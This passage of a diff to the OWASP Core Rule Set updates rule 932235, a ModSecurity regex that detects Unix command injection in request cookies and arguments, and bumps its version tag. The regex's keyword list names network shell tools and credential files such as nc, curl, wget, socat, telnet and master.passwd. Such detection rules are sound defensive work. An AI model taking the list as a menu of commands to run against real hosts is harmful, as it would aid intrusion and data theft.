     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -179,7 +180,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932235
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\x0b&\)<>\|]|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|nsible|pt(?:-get|itude[\s\x0b&\)<>\|])|r(?:ch[\s\x0b&\)<>\|]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm)|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:a(?:ncel|psh)[\s\x0b&\)<>\|]|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab))|s(?:cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:psfilter|rl[\s\x0b&\)<>\|]))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\x0b&\)<>\|]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:2fsck|(?:asy_instal|va)l|cho[\s\x0b&\)<>\|]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r)))|f(?:acter|(?:etch|lock|unction)[\s\x0b&\)<>\|]|grep|i(?:le(?:[\s\x0b&\)<>\|]|test)|(?:n(?:d|ger)|sh)[\s\x0b&\)<>\|])|o(?:ld[\s\x0b&\)<>\|]|reach)|ping|tp(?:stats|who))|g(?:awk[\s\x0b&\)<>\|]|core|e(?:ni(?:e[\s\x0b&\)<>\|]|soimage)|tfacl[\s\x0b&\)<>\|])|hci|i(?:mp[\s\x0b&\)<>\|]|nsh)|r(?:ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|]|sshell)|l(?:a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|dconfig|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\x0b&\)<>\|]|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ke[\s\x0b&\)<>\|]|ster\.passwd|wk)|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt[\s\x0b&\)<>\|]|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\x0b&\)<>\|]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|(?:ice|ull)[\s\x0b&\)<>\|]|map|o(?:de[\s\x0b&\)<>\|]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:cman|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:f(?:la)?tex|ksh)|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|(?:ft|gre)p|hp(?:-cgi|[57])|i(?:(?:co|ng)[\s\x0b&\)<>\|]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\x0b&\)<>\|])|s(?:ed|ftp|ql)|tar(?:diff|grep)?|u(?:ppet[\s\x0b&\)<>\|]|shd)|wd\.db|y(?:thon[^\s\x0b]|3?versions))|r(?:ak(?:e[\s\x0b&\)<>\|]|u)|bash|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\x0b&\)<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\x0b&\)<>\|]|user)|nano|oute[\s\x0b&\)<>\|]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|c(?:hed|r(?:een|ipt))|nap)[\s\x0b&\)<>\|]|diff|e(?:(?:lf|rvice)[\s\x0b&\)<>\|]|ndmail|t(?:arch|env|facl[\s\x0b&\)<>\|]|sid))|ftp|h(?:\.distrib|(?:adow|ells)[\s\x0b&\)<>\|]|u(?:f|tdown[\s\x0b&\)<>\|]))|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:datectl|out[\s\x0b&\)<>\|])|mux|ouch[\s\x0b&\)<>\|]|r(?:aceroute6?|off)|shark)|u(?:limit[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|p(?:2date[\s\x0b&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\x0b&\)<>\|]|gr|mdiff|pw|rsh|sudo)|olatility[\s\x0b&\)<>\|])|w(?:a(?:ll|tch)[\s\x0b&\)<>\|]|get|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more))|z(?:athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|s(?:oelim|td(?:(?:ca|m)t|grep|less)?)|ypper))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))(?:[\s\x0b&\),<>\|]|$)|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|tobm|xel)(?:[\s\x0b&\),<>\|]|$)|nsible|pt(?:-get|itude(?:[\s\x0b&\),<>\|]|$))|r(?:ch(?:[\s\x0b&\),<>\|]|$)|ia2c|j(?:-register|disp))|s(?:cii(?:-xfr|85)|pell))|b(?:a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|idge(?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$))|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more))|c(?:[89]9-gcc|a(?:ncel|psh)(?:[\s\x0b&\),<>\|]|$)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:[\s\x0b&\),<>\|]|$|\+\+)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|p(?:(?:an|io)(?:[\s\x0b&\),<>\|]|$)|ulimit)|r(?:ash(?:[\s\x0b&\),<>\|]|$)|on(?:[\s\x0b&\),<>\|]|$|tab))|s(?:cli(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:psfilter|rl(?:[\s\x0b&\),<>\|]|$)))|d(?:(?:ash|i(?:alog|ff)|vips)(?:[\s\x0b&\),<>\|]|$)|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:2fsck|asy_install|(?:cho|fax|grep|macs|sac|val)(?:[\s\x0b&\),<>\|]|$)|n(?:d(?:if|sw)(?:[\s\x0b&\),<>\|]|$)|v-update)|x(?:(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool))|f(?:acter|d(?:(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|(?:etch|grep|lock|unction)(?:[\s\x0b&\),<>\|]|$)|i(?:le(?:[\s\x0b&\),<>\|]|$|test)|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$)|tp(?:stats|who))|g(?:(?:awk|core|i(?:mp|nsh)|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage)|tfacl(?:[\s\x0b&\),<>\|]|$))|hc(?:-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:(?:cat|ep)(?:[\s\x0b&\),<>\|]|$)|oupmod)|tester|unzip)|h(?:(?:ash|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:(?:conv|nstall)(?:[\s\x0b&\),<>\|]|$)|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|p(?:6?tables|config|p(?:eveprinter|find|tool))|spell)|j(?:(?:ava|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:in(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$)|sshell)|l(?:a(?:st(?:comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|dconfig|ess(?:echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:cate|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|s(?:(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|ynx(?:[\s\x0b&\),<>\|]|$)|z(?:4c(?:[\s\x0b&\),<>\|]|$|at)|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore)))|m(?:a(?:il(?:[\s\x0b&\),<>\|]|$|[qx](?:[\s\x0b&\),<>\|]|$))|(?:ke|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:squitto|unt(?:[\s\x0b&\),<>\|]|$))|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt(?:[\s\x0b&\),<>\|]|$)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:(?:a(?:no|sm|wk)|ice|map|o(?:de|hup)|ping|roff|ull)(?:[\s\x0b&\),<>\|]|$)|c(?:\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:ctave(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:cman|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|(?:(?:ft|gre)p|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|i(?:(?:co|gz|ng)(?:[\s\x0b&\),<>\|]|$)|dstat)|k(?:exec|g_?info|ill(?:[\s\x0b&\),<>\|]|$))|rint(?:env|f(?:[\s\x0b&\),<>\|]|$))|s(?:(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|tar(?:[\s\x0b&\),<>\|]|$|diff|grep)|wd\.db|y(?:3?versions|thon(?:[23]|[^\s\x0b]{1,10}\b)))|r(?:(?:ak[eu]|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|e(?:a(?:delf|lpath)|(?:(?:boo|dcarpe)t|name|p(?:eat|lace))(?:[\s\x0b&\),<>\|]|$)|stic)|l(?:ogin|wrap)|m(?:dir(?:[\s\x0b&\),<>\|]|$)|user)|pm(?:db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n-(?:mailcap|parts)))|s(?:(?:ash|c(?:hed|r(?:een|ipt))|diff|(?:ft|na)p|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:arch|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|mbclient|o(?:(?:ca|r)t(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|udo(?:[\s\x0b&\),<>_\|]|$|edit|replay)|vn(?:a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|sk(?:[\s\x0b&\),<>\|]|$|set))|c(?:l?sh(?:[\s\x0b&\),<>\|]|$)|p(?:dump|ing|traceroute))|elnet|(?:ftp|mux|ouch)(?:[\s\x0b&\),<>\|]|$)|ime(?:datectl|out(?:[\s\x0b&\),<>\|]|$))|r(?:aceroute6?|off(?:[\s\x0b&\